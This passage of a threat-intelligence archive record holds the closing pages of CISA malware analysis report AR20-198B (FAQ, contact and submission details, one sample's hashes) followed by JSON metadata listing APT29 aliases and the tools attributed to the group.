(ACLs).\r\nAdditional information on malware incident prevention and handling can be found in National Institute of Standards and\r\nTechnology (NIST) Special Publication 800-83, \"Guide to Malware Incident Prevention \u0026 Handling for Desktops 
and\r\nLaptops\".\r\nContact Information\r\nDocument FAQ\r\nWhat is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in\r\na timely manner. In most instances this report will provide initial indicators for computer and network defense. To request\r\nadditional analysis, please contact CISA and provide information regarding the level of desired analysis.\r\nWhat is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware\r\nanalysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide\r\ninformation regarding the level of desired analysis.\r\nCan I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to\r\nthis document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.\r\nCan I submit malware to CISA? Malware samples can be submitted via three methods:\r\nWeb: https://malware.us-cert.gov\r\nE-Mail: submit@malware.us-cert.gov\r\nFTP: ftp.malware.us-cert.gov (anonymous)\r\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software\r\nvulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.\r\nRevisions\r\nJuly 16, 2020: Initial Version\r\nSource: https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 44 of 44\n\nName Size 5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb 6900178 bytes  \nType ELF 64-bit LSB executable, x86-64, version 1 (SYSV)\nMD5 3a9cdd8a5cbc3ab10ad64c4bb641b41f  \nSHA1 e45f89c923d0361ce8f9c64a63031860a76b2d10  \n  Page 16 of 44",
	"extraction_quality": 1,
	"language": "NL",
	"sources": [
		"ETDA",
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b"
	],
	"report_names": [
		"ar20-198b"
	],
	"threat_actors": [
		{
			"id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e",
			"created_at": "2024-06-04T02:03:07.956135Z",
			"updated_at": "2026-04-10T02:00:03.689959Z",
			"deleted_at": null,
			"main_name": "IRON HEMLOCK",
			"aliases": [
				"APT29 ",
				"ATK7 ",
				"Blue Kitsune ",
				"Cozy Bear ",
				"The Dukes",
				"UNC2452 ",
				"YTTRIUM "
			],
			"source_name": "Secureworks:IRON HEMLOCK",
			"tools": [
				"CosmicDuke",
				"CozyCar",
				"CozyDuke",
				"DiefenDuke",
				"FatDuke",
				"HAMMERTOSS",
				"LiteDuke",
				"MiniDuke",
				"OnionDuke",
				"PolyglotDuke",
				"RegDuke",
				"RegDuke Loader",
				"SeaDuke",
				"Sliver"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb",
			"created_at": "2023-01-06T13:46:38.393409Z",
			"updated_at": "2026-04-10T02:00:02.955738Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"Cloaked Ursa",
				"TA421",
				"Blue Kitsune",
				"BlueBravo",
				"IRON HEMLOCK",
				"G0016",
				"Nobelium",
				"Group 100",
				"YTTRIUM",
				"Grizzly Steppe",
				"ATK7",
				"ITG11",
				"COZY BEAR",
				"The Dukes",
				"Minidionis",
				"UAC-0029",
				"SeaDuke"
			],
			"source_name": "MISPGALAXY:APT29",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434690,
	"ts_updated_at": 1775792236,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5efc88b09fcecce99d033cb200a80dcf53584f3b.pdf",
		"text": "https://archive.orkl.eu/5efc88b09fcecce99d033cb200a80dcf53584f3b.txt",
		"img": "https://archive.orkl.eu/5efc88b09fcecce99d033cb200a80dcf53584f3b.jpg"
	}
}